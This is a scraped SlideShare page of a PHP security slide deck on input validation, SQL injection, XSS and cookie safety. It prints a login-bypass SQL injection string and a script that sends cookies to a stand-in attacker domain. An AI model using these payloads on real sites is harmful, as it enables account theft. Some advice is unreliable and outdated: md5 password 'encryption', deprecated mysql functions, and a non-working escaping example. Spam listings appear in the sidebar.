SlideShare une entreprise Scribd logo

PHP Security

Télécharger en tant que PPT, PDF
Mindfire Solutions
Mindfire Solutions

PHP Security

Technologie
1  sur  22
PHP SECURITY
What Is Security? Security is a measurement, not a characteristic. ,[object Object],[object Object],[object Object],www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Consequently PHP applications often end up working with sensitive data a. Unauthorized access to this data is unacceptable. b. To prevent problems a secure design is needed . www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Basic Steps 1.Input fields must be sanitized before being used One of the key concepts you must accept is that user input is unreliable and not to be trusted. Partially lost in transmission between server & client. Corrupted by some in-between process. Modified by the malicoius user in an unexpected manner. Intentional attempt to gain unauthorized access or to crash the application. There are are many ways to sanitize data. One can use php inbuild function for the santization pupose or can use custom defined functions. Eg: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous. if (!empty($_GET['id'])) { $id = (int) $_GET['id']; } else{ $id = 0; } As well as PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
if (!ctype_alnum($_GET['login'])) { echo "Only A-Za-z0-9 are allowed."; } if (!ctype_alpha($_GET['captcha'])) { echo "Only A-Za-z are allowed."; } You can use also your own customized validation.Like function validateEmail($email){ if($email == ""){ return false; } else{ if(!preg_match("(^[-]+@([-a-z0-9]+)+[a-z]{2,4}$)i", $email)){ return false; } else{ return true; } } } www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
2.Data Validations As we all know there are 2 types of validation for a web application. As follows: a. Client side validation b. Server side validation Client side validation is not reliable as an attacker can always bypass the client side validations or can shuts off the client-side script routines, for example, by disabling JavaScript. Hence Server side validation is a must for the security point of view, even if the client-side validation do exists. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
3. Accessing Input Data: There are a series of super-globals which offer very simple access to the input data. $_GET , $_POST, $_SERVER, $_REQUEST Using GET to send sensitive data causes security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string like in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because, the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later. The POST method uses the HTTP body to pass information and this is good in this case because the HTTP body is not logged. Using POST doesn’t offer enough protection. The data’s confidentiality and integrity are still at risk because the information is still sent in clear text. So the use of encryption technique is required, using SSL. Ddata is stored and accessed securely. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
4.Escaping Output Output is anything that leaves your application, bound for a client. The client, in this case, is anything from aWeb browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands. To escape output intended for a Web browser, PHP provides htmlspecialchars()‏ and htmlentities(), EG: $_POST['data'] = “<script>alert('Security issues');</script>”; if (get_magic_quotes_gpc()) { $var = stripslashes($_POST['data']); } echo htmlentities($var ); www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
5.Register Globals The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Making register global on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled. Why it is a security risk? Let us consider the following block of codes <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?> www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Since $authorized is left un-initialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET. http://example.com/script.php?authorized=1 Solutions: Disable register_globals in PHP.ini. Already done by default as of PHP 4.2.0 . Code with error_reporting set to E_ALL. Allows you to see warnings about the use of un-initialized variables. Type sensitive validation conditions. Because input is always a string, type sensitive compare to a Boolean or an integer will always fail. A best practice is to initialize all variables. Error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
6.Error Reporting: During development, making error reporting turned on is good practise. ini_set('error_reporting',E_ALL); However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development ,your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong. error_reporting(E_ALL^E_NOTICE); // This is a 'sensible' reporting level ini_set('display_errors', 0); // Hide all error messages from the public ini_set('log_errors', 1); ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
7.SQL Injection SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. One of the most common vulnerabilities is when logging in to a site. Take this example: $username = $_POST['username']; $password = $_POST['password']; $result = mysql_query(&quot; SELECT * FROM site_users WHERE username = '$username' AND password = '$password' &quot;); if ( mysql_num_rows($result) > 0 )‏ // logged in www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
If the attacker enters a valid username in the username field &quot;rob&quot; and the following in the password field ' OR 1=1 ' The resulting query will look like this: SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1 Since the last crieteria will always be true.The user will be able to log in as rob without knowing rob's password. Prevnting Sql injection: The best way of cleaning input is using PHP's built in mysql_real_escape_string() function, this will escape characters such as ',&quot;&quot; and others. checking the magic quotes is on or off to avoid double escaping. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Function check_sql_injection($var){ if(get_magic_quotes_gpc()) { $var = stripslashes($var); } $var = mysql_real_escape_string($var); return $var; } Now this customized function can be used in sql query to prevent sql injection.. SELECT * FROM site_users WHERE username =check_sql_injection( '$username')‏ AND password = check_sql_injection( '$password)‏ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
8.XSS XSS stands for &quot;Cross Site Scripting&quot;, and refers to the act of inserting content, such as Javascript, into a page. Usually these attacks are used to steal cookies which often contain sensitive data such as login information. EG: $id = $_GET['id']; echo 'Displaying news item number '.$id; An attacker could pass string like this <script>window.location.href = &quot;http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script> If a user passed this simple Javascript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Prevent XSS attacks? This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built in strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
9. Passwords need to be stored securely. Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achivied using md5 command or any stronger method of algorithm. By using this, the attacker wont able access the password of a user. 10. Lock out functionality must be there for the login functionality. An attacker may continue to brute force the login functions until successful. So to prevent the same after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for another a given period of time. For example 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
11.The email forms are vulnerable to email header injection Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed and using captcha during mail form submission. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
12. Using Cookies Securely Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines: Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie. Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible. Consider encrypting information in cookies. Consider setting the Secure and HttpOnly properties on your cookies to true. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Mindfire Solutions Expertise in PHP ,[object Object],[object Object],[object Object],www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
For further queries contact us or call 1-248-686-1424 www.mindfiresolutions.com www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions

Recommandé

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 

Recommandé

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurationsMegha Sahu
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
System hacking
System hackingSystem hacking
System hackingCAS
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationOnwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesMohammed Danish Amber
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response StructureBhagyashreeGajera1
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesScott Hurrey
 
Sql injection
Sql injectionSql injection
Sql injectionMehul Boghra
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingNetsparker
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Sam Bowne
 
Email security presentation
Email security presentationEmail security presentation
Email security presentationSubhradeepMaji
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 

Contenu connexe

Tendances

security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurationsMegha Sahu
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
System hacking
System hackingSystem hacking
System hackingCAS
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response StructureBhagyashreeGajera1
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesScott Hurrey
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingNetsparker
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Sam Bowne
 
Email security presentation
Email security presentationEmail security presentation
Email security presentationSubhradeepMaji
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 

Tendances (20)

security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
System hacking
System hackingSystem hacking
System hacking
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response Structure
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Sql injection
Sql injectionSql injection
Sql injection
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
 
Email security presentation
Email security presentationEmail security presentation
Email security presentation
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
 

Similaire à PHP Security

Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 
Website Security
Website SecurityWebsite Security
Website SecurityMODxpo
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007Aung Khant
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
Php Security3895
Php Security3895Php Security3895
Php Security3895Aung Khant
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 

Similaire à PHP Security (20)

Web application security
Web application securityWeb application security
Web application security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
Php Security3895
Php Security3895Php Security3895
Php Security3895
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
Php security
Php securityPhp security
Php security
 
Php security3895
Php security3895Php security3895
Php security3895
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
secure php
secure phpsecure php
secure php
 
Download It
Download ItDownload It
Download It
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Web Security
Web SecurityWeb Security
Web Security
 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
 
Fav
FavFav
Fav
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 

Plus de Mindfire Solutions

High Availability of Azure Applications
High Availability of Azure ApplicationsHigh Availability of Azure Applications
High Availability of Azure ApplicationsMindfire Solutions
 
Oracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedOracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedMindfire Solutions
 
Introduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacIntroduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacMindfire Solutions
 
Get started with watch kit development
Get started with watch kit developmentGet started with watch kit development
Get started with watch kit developmentMindfire Solutions
 

Plus de Mindfire Solutions (20)

Physician Search and Review
Physician Search and ReviewPhysician Search and Review
Physician Search and Review
 
diet management app
diet management appdiet management app
diet management app
 
Business Technology Solution
Business Technology SolutionBusiness Technology Solution
Business Technology Solution
 
Remote Health Monitoring
Remote Health MonitoringRemote Health Monitoring
Remote Health Monitoring
 
Influencer Marketing Solution
Influencer Marketing SolutionInfluencer Marketing Solution
Influencer Marketing Solution
 
ELMAH
ELMAHELMAH
ELMAH
 
High Availability of Azure Applications
High Availability of Azure ApplicationsHigh Availability of Azure Applications
High Availability of Azure Applications
 
IOT Hands On
IOT Hands OnIOT Hands On
IOT Hands On
 
Glimpse of Loops Vs Set
Glimpse of Loops Vs SetGlimpse of Loops Vs Set
Glimpse of Loops Vs Set
 
Oracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedOracle Sql Developer-Getting Started
Oracle Sql Developer-Getting Started
 
Adaptive Layout In iOS 8
Adaptive Layout In iOS 8Adaptive Layout In iOS 8
Adaptive Layout In iOS 8
 
Introduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacIntroduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/Mac
 
LINQPad - utility Tool
LINQPad - utility ToolLINQPad - utility Tool
LINQPad - utility Tool
 
Get started with watch kit development
Get started with watch kit developmentGet started with watch kit development
Get started with watch kit development
 
Swift vs Objective-C
Swift vs Objective-CSwift vs Objective-C
Swift vs Objective-C
 
Material Design in Android
Material Design in AndroidMaterial Design in Android
Material Design in Android
 
Introduction to OData
Introduction to ODataIntroduction to OData
Introduction to OData
 
Ext js Part 2- MVC
Ext js Part 2- MVCExt js Part 2- MVC
Ext js Part 2- MVC
 
ExtJs Basic Part-1
ExtJs Basic Part-1ExtJs Basic Part-1
ExtJs Basic Part-1
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security Introduction
 

Dernier

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Dernier (20)

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
